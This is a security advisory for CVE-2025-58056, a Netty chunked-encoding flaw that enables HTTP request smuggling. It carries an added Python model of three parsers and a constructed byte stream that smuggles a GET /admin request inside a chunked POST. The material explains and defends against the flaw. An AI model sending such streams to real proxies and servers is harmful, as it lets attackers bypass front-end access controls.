PT-2025-35821 · Netty+6
Jeppw · Published 2025-09-03 · Updated 2026-05-18 · CVE-2025-58056
CVSS v2.0: 7.8 (High)
| Vector | AV:N/AC:L/Au:N/C:N/I:C/A:N |
Name of the Vulnerable Software and Affected Versions
Netty version 4.1.124.Final
Netty versions 4.2.0.Alpha3 through 4.2.4.Final
Description
Netty is an asynchronous event-driven network application framework for developing maintainable, high-performance protocol servers and clients. When decoding a chunked HTTP/1.1 body, the affected versions incorrectly accept a standalone line feed (LF) as the terminator of a chunk-size line, whether or not a carriage return (CR) precedes it, instead of requiring CRLF as HTTP/1.1 specifies. Placed behind a reverse proxy that treats a bare LF differently, an attacker can craft a request that the proxy frames as a single request but Netty frames as two, which enables HTTP request smuggling.
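As an added worked example (not Netty's code and not part of this advisory), the following Python models the parsing difference described above with a miniature chunked-body parser that supports three chunk-size-line policies. `LENIENT_LF` accepts a bare LF (the behaviour attributed to the affected versions), `STRICT` requires CRLF (the behaviour the fixed versions restore), and `JUNK_TO_CRLF` is an assumed front-end model that takes the leading hex digits as the size and ignores everything else up to CRLF; no specific proxy is claimed to behave this way. The byte stream is constructed for the demonstration: the front-end model frames it as one POST, the bare-LF parser frames it as a POST followed by a GET /admin, and the strict parser rejects it.

```python
"""Added example: one client byte stream, three chunk-size-line policies."""
from typing import List, Tuple

STRICT = "strict"              # CRLF only (behaviour of the fixed versions)
LENIENT_LF = "lenient_lf"      # bare LF also ends the size line (affected versions)
JUNK_TO_CRLF = "junk_to_crlf"  # ASSUMED front-end model: leading hex digits are the
                               # size, anything else up to CRLF is ignored

HEX = b"0123456789abcdefABCDEF"


def read_chunk_size(data: bytes, pos: int, policy: str) -> Tuple[int, int]:
    """Return (chunk_size, offset just past the size-line terminator)."""
    i = pos
    while i < len(data) and data[i] in HEX:
        i += 1
    digits = data[pos:i]
    if not digits:
        raise ValueError("chunk-size line has no hex digits")
    if policy == JUNK_TO_CRLF:
        end = data.find(b"\r\n", i)
        if end < 0:
            raise ValueError("chunk-size line lacks CRLF")
        return int(digits, 16), end + 2
    if data[i:i + 2] == b"\r\n":
        return int(digits, 16), i + 2
    if policy == LENIENT_LF and data[i:i + 1] == b"\n":
        return int(digits, 16), i + 1          # the flaw: bare LF accepted
    raise ValueError("chunk-size line not terminated by CRLF")


def read_chunked_body(data: bytes, pos: int, policy: str) -> Tuple[bytes, int]:
    """Decode chunks starting at pos; return (body, offset after the final CRLF).
    Chunk data and the last chunk must always end in CRLF; only the chunk-size
    line terminator depends on the policy. Trailers are not supported."""
    body = bytearray()
    while True:
        size, pos = read_chunk_size(data, pos, policy)
        if size == 0:
            if data[pos:pos + 2] != b"\r\n":
                raise ValueError("missing end-of-body CRLF")
            return bytes(body), pos + 2
        chunk = data[pos:pos + size]
        if len(chunk) != size or data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data truncated or not CRLF-terminated")
        body += chunk
        pos += size + 2


def parse_requests(stream: bytes, policy: str) -> List[Tuple[str, bytes]]:
    """Split a client byte stream into (request_line, body) pairs."""
    reqs: List[Tuple[str, bytes]] = []
    pos = 0
    while pos < len(stream):
        while stream.startswith(b"\r\n", pos):   # skip empty lines between requests
            pos += 2
        if pos >= len(stream):
            break
        end = stream.find(b"\r\n\r\n", pos)
        if end < 0:
            raise ValueError("incomplete header block")
        lines = stream[pos:end].decode("ascii").split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        pos = end + 4
        if headers.get("transfer-encoding", "").lower() == "chunked":
            body, pos = read_chunked_body(stream, pos, policy)
        else:
            n = int(headers.get("content-length", "0"))
            body, pos = stream[pos:pos + n], pos + n
            if len(body) != n:
                raise ValueError("body truncated")
        reqs.append((lines[0], body))
    return reqs


# Constructed attack stream (not a captured exploit): the chunk-size line "3e"
# ends in a bare LF. A bare-LF parser reads 0x3e filler bytes, the last chunk,
# and then a second request. The front-end model reads the whole first line up
# to CRLF, then takes the next 0x3e bytes (last-chunk marker + smuggled GET) as
# chunk data, so it sees one request and forwards everything.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: example\r\nContent-Length: 7\r\n\r\n"
N = 5 + len(SMUGGLED)                       # 62 == 0x3e
STREAM = (
    b"POST /upload HTTP/1.1\r\nHost: example\r\nTransfer-Encoding: chunked\r\n\r\n"
    + b"%x\n" % N + b"x" * N + b"\r\n"      # size line ends in LF; N bytes; CRLF
    + b"0\r\n\r\n"                          # bare-LF parser: body ends here
    + SMUGGLED                              # bare-LF parser: a new request
    + b"\r\n0\r\n\r\n"                      # front end: data terminator + last chunk
)


def demo() -> Tuple[List[str], List[str]]:
    """Request lines as seen by the front-end model and by the bare-LF parser."""
    front = [r[0] for r in parse_requests(STREAM, JUNK_TO_CRLF)]
    back = [r[0] for r in parse_requests(STREAM, LENIENT_LF)]
    return front, back


def strict_rejects(stream: bytes) -> bool:
    """True when the CRLF-only parser refuses the stream."""
    try:
        parse_requests(stream, STRICT)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    front, back = demo()
    print("front-end model sees:", front)
    print("bare-LF parser sees:", back)
    print("strict parser rejects stream:", strict_rejects(STREAM))
```

The desynchronisation comes entirely from where each side believes the chunk-size line ends: both read the same hex size, but the bare-LF parser starts chunk data one byte after the LF while the front-end model starts it after the CRLF, so the two views of the body are offset by the filler plus CRLF and the smuggled GET lands in the back end's next request. Requiring CRLF, as the fixed versions do, makes the stream a hard parse error instead.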
Recommendations
Upgrade to Netty 4.1.125.Final (4.1.x line)
Upgrade to Netty 4.2.5.Final (4.2.x line)
Exploit
Fix
DoS
HTTP Request/Response Smuggling
Weakness Enumeration
Related identifiers
Affected products
Alt Linux
Debian
Linuxmint
Netty
Red Os
Suse
Ubuntu